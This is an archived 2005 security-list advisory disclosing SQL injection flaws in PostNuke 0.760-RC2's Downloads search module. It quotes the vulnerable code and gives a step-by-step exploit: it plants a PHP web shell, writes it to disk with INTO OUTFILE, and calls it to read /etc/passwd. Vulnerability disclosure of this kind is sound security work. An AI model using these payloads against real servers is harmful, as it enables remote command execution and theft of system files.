Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[SECURITYREASON.COM] PostNuke SQL Injection 0.760-RC2=>x cXIb8O3.3

from [Maksymilian Arciemowicz] Network Security [Permanent Link]
Subject: [SECURITYREASON.COM] PostNuke SQL Injection 0.760-RC2=>x cXIb8O3.3
Date: 28 Feb 2005 21:04:10 -0000 


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[PostNuke SQL Injection 0.760-RC2=>x cXIb8O3.3]

Author: cXIb8O3(Maksymilian Arciemowicz)
Date: 20.2.2005
from securityreason.com TEAM

- --- 0.Description ---

PostNuke: The Phoenix Release (0.750) and (0.760-RC2)

PostNuke is an open source, open developement content management system
(CMS). PostNuke started as a fork from PHPNuke (http://www.phpnuke.org) and
provides many enhancements and improvements over the PHP-Nuke system. PostNuke
is still undergoing development but a large number of core functions are now
stabilising and a complete API for third-party developers is now in place.
If you would like to help develop this software, please visit our homepage
at http://noc.postnuke.com/
You can also visit us on our IRC Server irc.postnuke.com channel
#postnuke-support
#postnuke-chat
#postnuke
Or at the Community Forums located at:
http://forums.postnuke.com/


- --- 1. Sql Injection ---
This sql injection exist in modules/Downloads/dl-search.php on line 74 on 
function search()

Vulnerabilities code:
- -51-68---
    if ($show!="") {
        $downloadsresults = $show;
    } else {
        $show=$downloadsresults;
    }
    //$query = stripslashes($query);
    $column = &$pntable['downloads_downloads_column'];
        $sql = "SELECT $column[lid], $column[cid], $column[sid],
                              $column[title], $column[url], 
$column[description],
                              $column[date], $column[hits], 
$column[downloadratingsummary],
                              $column[totalvotes], $column[totalcomments],
                              $column[filesize], $column[version], 
$column[homepage]
                              FROM $pntable[downloads_downloads]
                              WHERE $column[title] LIKE 
'%".pnVarPrepForStore($query)."%'
                                OR $column[description] LIKE 
'%".pnVarPrepForStore($query)."%'
                                ORDER BY 
$pntable[downloads_downloads].$orderby";

    $result = $dbconn->SelectLimit($sql, $downloadsresults, (int)$min);
- -51-68---

Error exist in varible $show.

Go to this url to view error:

http://[HOST]/[DIR]/index.php?name=Downloads&req=search&query=&show=cXIb8O3

Error message :
- ---------------
Fatal error: Call to a member function PO_RecordCount() on a non-object in 
/www/PostNuke-0.760-RC2/html/modules/Downloads/dl-search.php on line 74
- ---------------

Because this sql injection is after ORDER BY.. we can not use UNION etc. But 
check this exploit.

Exploit 
Check dir for PostNuke. 

http://[HOST]/[DIR]/index.php?name=Downloads&req=search&query=&show=cXIb8O3

Error message :
- ---------------
Fatal error: Call to a member function PO_RecordCount() on a non-object in 
/www/PostNuke-0.760-RC2/html/modules/Downloads/dl-search.php on line 74
- ---------------

For exemple prefix is /www/PostNuke-0.760-RC2/html/. 

Now add new download and insert to "Description" or "Home page" php code. For 
example add:

- ---
<? system($_GET[cx]); ?>
- ---

And when this download exist in db, go to:


http://[HOST]/[DIR]/index.php?name=Downloads&req=search&query=[Program 
name]&show=10%20INTO%20OUTFILE%20'/[PATH]/pnTemp/Xanthia_cache/cXIb8O3.php'/*

and now for example..

http://[HOST]/[DIR]/pnTemp/Xanthia_cache/cXIb8O3.php?cx=cat /etc/passwd

;]

- --- 2. Sql Error ---
This sql injection exist in modules/Downloads/dl-search.php on line 74 on 
function search()

Vulnerabilities code:
- -46-68---
    if(isset($orderby)) {
        $orderby = convertorderbyin($orderby);
    } else {
        $orderby = $pntable['downloads_downloads_column']['title'] . ' ASC';
    }
    if ($show!="") {
        $downloadsresults = $show;
    } else {
        $show=$downloadsresults;
    }
    //$query = stripslashes($query);
    $column = &$pntable['downloads_downloads_column'];
        $sql = "SELECT $column[lid], $column[cid], $column[sid],
                              $column[title], $column[url], 
$column[description],
                              $column[date], $column[hits], 
$column[downloadratingsummary],
                              $column[totalvotes], $column[totalcomments],
                              $column[filesize], $column[version], 
$column[homepage]
                              FROM $pntable[downloads_downloads]
                              WHERE $column[title] LIKE 
'%".pnVarPrepForStore($query)."%'
                                OR $column[description] LIKE 
'%".pnVarPrepForStore($query)."%'
                                ORDER BY 
$pntable[downloads_downloads].$orderby";

    $result = $dbconn->SelectLimit($sql, $downloadsresults, (int)$min);
- -46-68---

Error exist in:

- ---
$orderby = convertorderbyin($orderby);
- ---

and sql querty is:

- ---
SELECT pn_downloads_downloads.pn_lid, pn_downloads_downloads.pn_cid, 
pn_downloads_downloads.pn_sid, pn_downloads_downloads.pn_title, 
pn_downloads_downloads.pn_url, pn_downloads_downloads.pn_description, 
pn_downloads_downloads.pn_date, pn_downloads_downloads.pn_hits, 
pn_downloads_downloads.pn_ratingsummary, pn_downloads_downloads.pn_totalvotes, 
pn_downloads_downloads.pn_totalcomments, pn_downloads_downloads.pn_filesize, 
pn_downloads_downloads.pn_version, pn_downloads_downloads.pn_homepage FROM 
pn_downloads_downloads WHERE pn_downloads_downloads.pn_title LIKE '%%' OR 
pn_downloads_downloads.pn_description LIKE '%%' ORDER BY pn_downloads_downloads.
- ---

Url:
http://[HOST]/[DIR]/index.php?name=Downloads&req=search&query=&orderby=


- --- 3. How to fix ---

Download the new version of the script or update.

- --- 4. Greets ---

sp3x

and for :(

- --- 5.Contact ---
Author: Maksymilian Arciemowicz
Location: Poland(Jelenia Gora), Luxembourg(Bereldange)
Email: max [at] jestsuper [dot] pl
GPG-KEY: http://security.jestsuper.pl
SECURITYREASON.COM TEAM

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (FreeBSD)

iD8DBQFCI32+znmvyJCR4zQRAtXhAKCuLzk7Q1sWCRBemwSOE+hEwFp9uQCfU2I3
rJzJSh3x+HbJfavy8FKfKYM=
=Mpoz
-----END PGP SIGNATURE-----
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [SECURITYREASON.COM] PostNuke SQL Injection 0.760-RC2=>x cXIb8O3.3, Maksymilian Arciemowicz <=
Previous by Date:  [Full-Disclosure] [ GLSA 200502-33 ] MediaWiki: Multiple vulnerabilities, Thierry Carrez
Next by Date:  [SECURITYREASON.COM] PostNuke Critical XSS 0.760-RC2=>x cXIb8O3.2, Maksymilian Arciemowicz
Previous by Thread:  [Full-Disclosure] [ GLSA 200502-33 ] MediaWiki: Multiple vulnerabilities, Thierry Carrez
Next by Thread:  [SECURITYREASON.COM] PostNuke Critical XSS 0.760-RC2=>x cXIb8O3.2, Maksymilian Arciemowicz
Indexes:  [Date] [Thread] [Top] [All Lists]